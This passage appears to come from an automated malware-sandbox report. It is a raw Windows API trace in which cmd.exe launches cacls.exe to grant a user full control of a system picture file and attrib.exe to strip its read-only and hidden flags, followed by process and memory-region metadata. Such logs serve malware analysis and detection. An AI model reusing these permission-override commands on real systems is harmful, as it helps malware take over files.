lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.518] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.518] _wcsicmp (_String1="KEYS", 
_String2="CD") returned 8 [0186.518] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.518] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.518] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.518] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.518] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.519] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.519] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.519] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.519] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef480, lpFilePart=0x2ef47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef47c*="Desktop") returned 0x18 [0186.519] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.519] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef1fc | out: lpFindFileData=0x2ef1fc) returned 0x4e0ae8 [0186.519] FindClose (in: hFindFile=0x4e0ae8 | out: hFindFile=0x4e0ae8) returned 1 [0186.519] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef1fc | out: lpFindFileData=0x2ef1fc) returned 0x4e0ae8 [0186.519] FindClose (in: hFindFile=0x4e0ae8 | out: hFindFile=0x4e0ae8) returned 1 [0186.519] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef1fc | out: lpFindFileData=0x2ef1fc) returned 0x4e0ae8 [0186.519] FindClose (in: hFindFile=0x4e0ae8 | out: hFindFile=0x4e0ae8) returned 1 [0186.519] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.520] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.520] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.520] GetEnvironmentStringsW () returned 0x4e0308* [0186.520] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.520] GetConsoleOutputCP () returned 0x1b5 [0186.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.520] GetUserDefaultLCID () returned 0x409 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5c0, cchData=128 | out: lpLCData="0") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5c0, cchData=128 | out: lpLCData="0") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5c0, cchData=128 | out: lpLCData="1") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.521] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.521] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.522] GetConsoleTitleW (in: lpConsoleTitle=0x4d09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.522] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.522] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.522] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.523] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.523] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.523] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.523] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.523] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.523] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.524] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.524] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.526] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.526] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.526] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.526] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.526] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.526] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.526] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.528] GetConsoleTitleW (in: lpConsoleTitle=0x2ef254, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.529] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.529] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.529] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.529] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.529] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.529] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.529] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.529] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.529] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.529] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.529] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.529] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.529] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.529] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.529] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.529] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.529] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.529] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.529] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.529] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.529] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.529] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.529] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.529] 
_wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.529] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.529] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.529] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.530] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.530] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.530] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.530] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.530] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.530] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.530] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.530] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.530] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.530] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.530] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.530] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.530] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.530] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.530] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 
[0186.530] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.530] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.530] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.530] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.530] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.530] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.530] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.530] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.530] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.530] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.530] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.530] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.531] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.531] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.531] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.531] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.531] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.531] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.531] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.531] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.531] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.531] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.531] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.531] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.531] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.531] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.531] _wcsicmp (_String1="CACLS", _String2="IF") returned 
-6 [0186.531] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.531] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.531] SetErrorMode (uMode=0x0) returned 0x0 [0186.531] SetErrorMode (uMode=0x1) returned 0x0 [0186.531] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e1e98, lpFilePart=0x2eed74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2eed74*="Desktop") returned 0x18 [0186.531] SetErrorMode (uMode=0x0) returned 0x1 [0186.532] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.532] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.537] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.538] GetLastError () returned 0x2 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.538] GetLastError () returned 0x2 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4e2180 [0186.538] FindClose (in: hFindFile=0x4e2180 | out: hFindFile=0x4e2180) returned 1 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.538] GetLastError () returned 0x2 [0186.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4e2180 [0186.539] FindClose (in: hFindFile=0x4e2180 | out: hFindFile=0x4e2180) returned 1 [0186.539] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.539] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.539] GetConsoleTitleW (in: lpConsoleTitle=0x2eefe8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.539] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eee70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eef38 | out: lpAttributeList=0x2eee70, lpSize=0x2eef38) returned 1 [0186.539] UpdateProcThreadAttribute (in: lpAttributeList=0x2eee70, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eef30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eee70, lpPreviousValue=0x0) returned 1 [0186.539] GetStartupInfoW (in: lpStartupInfo=0x2eee2c | out: lpStartupInfo=0x2eee2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.539] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.540] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, 
lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2eeecc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eef18 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2eef18*(hProcess=0x50, hThread=0x4c, dwProcessId=0xeb8, dwThreadId=0xebc)) returned 1 [0186.542] CloseHandle (hObject=0x4c) returned 1 [0186.542] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.542] GetEnvironmentStringsW () returned 0x4e0308* [0186.542] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.542] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.610] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2eee0c | out: lpExitCode=0x2eee0c*=0x0) returned 1 [0186.610] CloseHandle (hObject=0x50) returned 1 [0186.610] _vsnwprintf (in: _Buffer=0x2eef54, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eee18 | out: _Buffer="00000000") returned 8 [0186.610] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.610] GetEnvironmentStringsW () returned 0x4e2410* [0186.611] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.611] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.611] GetEnvironmentStringsW () returned 0x4e2410* [0186.611] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.611] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eee70 | out: lpAttributeList=0x2eee70) [0186.611] GetConsoleTitleW (in: lpConsoleTitle=0x2ef254, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.611] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.611] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.611] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.611] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.612] GetLastError () returned 0x2 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.612] GetLastError () returned 0x2 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4de4d8 [0186.612] FindClose (in: hFindFile=0x4de4d8 | out: hFindFile=0x4de4d8) returned 1 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.612] GetLastError () returned 0x2 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4de4d8 [0186.612] FindClose (in: hFindFile=0x4de4d8 | out: hFindFile=0x4de4d8) returned 1 
[0186.612] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.612] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.612] GetConsoleTitleW (in: lpConsoleTitle=0x2eefe8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.613] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eee70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eef38 | out: lpAttributeList=0x2eee70, lpSize=0x2eef38) returned 1 [0186.613] UpdateProcThreadAttribute (in: lpAttributeList=0x2eee70, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eef30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eee70, lpPreviousValue=0x0) returned 1 [0186.613] GetStartupInfoW (in: lpStartupInfo=0x2eee2c | out: lpStartupInfo=0x2eee2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.613] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.613] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2eeecc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x2eef18 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessInformation=0x2eef18*(hProcess=0x4c, hThread=0x50, dwProcessId=0x408, dwThreadId=0xeb4)) returned 1 [0186.614] CloseHandle (hObject=0x50) returned 1 [0186.614] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.614] GetEnvironmentStringsW () returned 0x4e2410* [0186.614] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.614] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.730] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2eee0c | out: lpExitCode=0x2eee0c*=0x0) returned 1 [0186.730] CloseHandle (hObject=0x4c) returned 1 [0186.730] _vsnwprintf (in: _Buffer=0x2eef54, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eee18 | out: _Buffer="00000000") returned 8 [0186.730] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.730] GetEnvironmentStringsW () returned 0x4e2410* [0186.730] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.730] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.730] GetEnvironmentStringsW () returned 0x4e2410* [0186.730] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.730] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eee70 | out: lpAttributeList=0x2eee70) [0186.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.731] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.731] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.731] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.731] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.731] SetConsoleInputExeNameW () returned 0x1 [0186.731] GetConsoleOutputCP () returned 0x1b5 [0186.731] GetCPInfo (in: 
CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.731] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.731] exit (_Code=0) Process: id = "386" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "385" os_parent_pid = "0x128" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26831 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26832 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26833 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26834 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 26835 start_va = 0xa50000 end_va = 0xa58fff entry_point = 0xa50000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26836 start_va = 0x77230000 end_va = 0x7736bfff 